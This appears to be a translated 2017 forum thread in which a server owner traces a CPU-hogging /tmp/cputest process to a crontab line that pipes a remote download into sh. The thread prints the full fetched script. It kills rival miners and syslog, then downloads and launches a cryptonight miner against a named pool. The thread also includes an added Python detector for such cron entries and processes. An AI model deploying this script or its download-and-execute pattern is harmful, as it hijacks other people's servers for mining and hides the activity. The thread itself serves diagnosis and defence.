Help: a process /tmp/cputest keeps maxing out the CPU; every time I delete it, it comes back. How do I find out where this file is coming from?

    Symo · 2017-04-06 10:20:03 +08:00 · 5867 views

    screen

    8 replies    2017-04-06 13:16:25 +08:00
    #1 Symo (OP) · 2017-04-06 10:25:47 +08:00
    Found the problem. There's this line in crontab:
    `curl http://194.87.239.7/common/logo.jpg|sh`
    The downloaded file looks like this:
    ```
    #!/bin/sh
    rm -rf /tmp/index_bak.*
    rm -rf /tmp/httpd.conf.*
    rm -rf /tmp/httpd.conf
    pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
    pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
    pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
    pkill -f cpuloadtest
    pkill -f crypto-pool
    pkill -f xmr
    pkill -f prohash
    pkill -f monero
    pkill -f miner
    pkill -f nanopool
    pkill -f minergate
    pkill rsyslog
    pkill syslog
    pkill -f "/tmp/apache"
    pkill -f "/tmp/httpd.conf"
    ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
    ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
    if [ $? -ne 0 ]
    then
    echo "start process....."
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
    then
    curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg
    wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg
    else
    curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
    wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
    fi
    chmod +x /tmp/cputest
    nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null
    else
    echo "runing....."
    fi
    ```

    What is this script meant to do?
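A small triage helper, added here as an example and not part of the thread: it scans a crontab dump for the two things the OP's cron entry shows (a download piped straight into `sh`, and execution out of a scratch directory such as `/tmp`), and scans `ps` output for the same pattern plus the high CPU and `stratum+tcp://` pool URI that gave the miner away. The crontab and process list below are constructed samples using documentation-range IPs; the thresholds and reason tags are my own choices.

```python
import re
from typing import Dict, List

# Constructed crontab dump (not from the thread). Line 3 mirrors the shape of the
# entry the OP found: a download piped directly into sh.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl http://198.51.100.23/common/logo.jpg|sh
*/10 * * * * wget -q -O- http://203.0.113.7/x.txt | bash
30 2 * * 0 /opt/backup/run.sh
"""

# Constructed `ps -eo user,pid,pcpu,args` output (not from the thread).
SAMPLE_PS = """\
USER     PID %CPU COMMAND
root       1  0.0 /sbin/init
www     2041  0.3 nginx: worker process
nobody  3377 99.7 /tmp/cputest -B -a cryptonight -o stratum+tcp://203.0.113.9:80
root    4100  0.1 /usr/bin/python3 /opt/app/worker.py
"""

# A download tool whose output is piped into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|dash|zsh|ksh)\b")
# Something executed from a world-writable scratch directory.
SCRATCH_EXEC = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/\S+")
# Pool URI scheme used by mining clients on their command line.
STRATUM_URI = re.compile(r"stratum\+tcp://")

# Reason tags returned in findings (names chosen for this example).
R_PIPE = "download piped into shell"
R_SCRATCH = "runs from scratch directory"
R_CPU = "cpu above threshold"
R_STRATUM = "mining pool uri"


def find_suspicious_cron_lines(crontab_text: str) -> List[Dict[str, object]]:
    """Return one finding per non-comment crontab line that matches a pattern."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), start=1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if PIPE_TO_SHELL.search(entry):
            reasons.append(R_PIPE)
        if SCRATCH_EXEC.search(entry):
            reasons.append(R_SCRATCH)
        if reasons:
            findings.append({"line": lineno, "entry": entry, "reasons": reasons})
    return findings


def find_suspicious_processes(ps_text: str, cpu_threshold: float = 80.0) -> List[Dict[str, object]]:
    """Parse `ps -eo user,pid,pcpu,args` output and flag miner-like processes."""
    findings = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, pcpu, args = parts
        reasons = []
        if SCRATCH_EXEC.search(args):
            reasons.append(R_SCRATCH)
        try:
            if float(pcpu) >= cpu_threshold:
                reasons.append(R_CPU)
        except ValueError:
            pass  # malformed %CPU column; ignore that signal for this row
        if STRATUM_URI.search(args):
            reasons.append(R_STRATUM)
        if reasons:
            findings.append({"user": user, "pid": pid, "args": args, "reasons": reasons})
    return findings


def report(crontab_text: str, ps_text: str) -> List[str]:
    """Human-readable lines; a hit is a lead to check, not a verdict on its own."""
    out = []
    for f in find_suspicious_cron_lines(crontab_text):
        out.append(f"cron line {f['line']}: {', '.join(f['reasons'])}: {f['entry']}")
    for f in find_suspicious_processes(ps_text):
        out.append(f"pid {f['pid']} ({f['user']}): {', '.join(f['reasons'])}: {f['args']}")
    return out


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CRONTAB, SAMPLE_PS)))
```

On a real host, feed it `crontab -l` for every user plus the files under `/etc/cron.d` and `/var/spool/cron`, and `ps -eo user,pid,pcpu,args`; the `curl ... | sh` rule will also fire on legitimate one-line installers, which is why each finding carries its reasons for a human to weigh.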
    #2 ryd994 · 2017-04-06 10:30:09 +08:00 via Android
    Hahaha, that's nasty: first it kills everyone else's mining software,
    then it starts its own.
    #3 xss · 2017-04-06 10:31:18 +08:00
    Mining trojan....
    #4 holyzhou · 2017-04-06 10:51:00 +08:00
    Can I just say this script is really ugly.
    #5 mingl0280 · 2017-04-06 12:27:45 +08:00
    Mining trojan 233333
    #6 expy · 2017-04-06 12:44:26 +08:00
    Competitors are the worst enemy. Naming it cputest is clever too 233
    #7 AlisaDestiny · 2017-04-06 13:13:43 +08:00
    I really learned something here. What I'm curious about is how this cron task got written in there.
    #8 kmahyyg · 2017-04-06 13:16:25 +08:00 via Android
    Reply #3 has it right.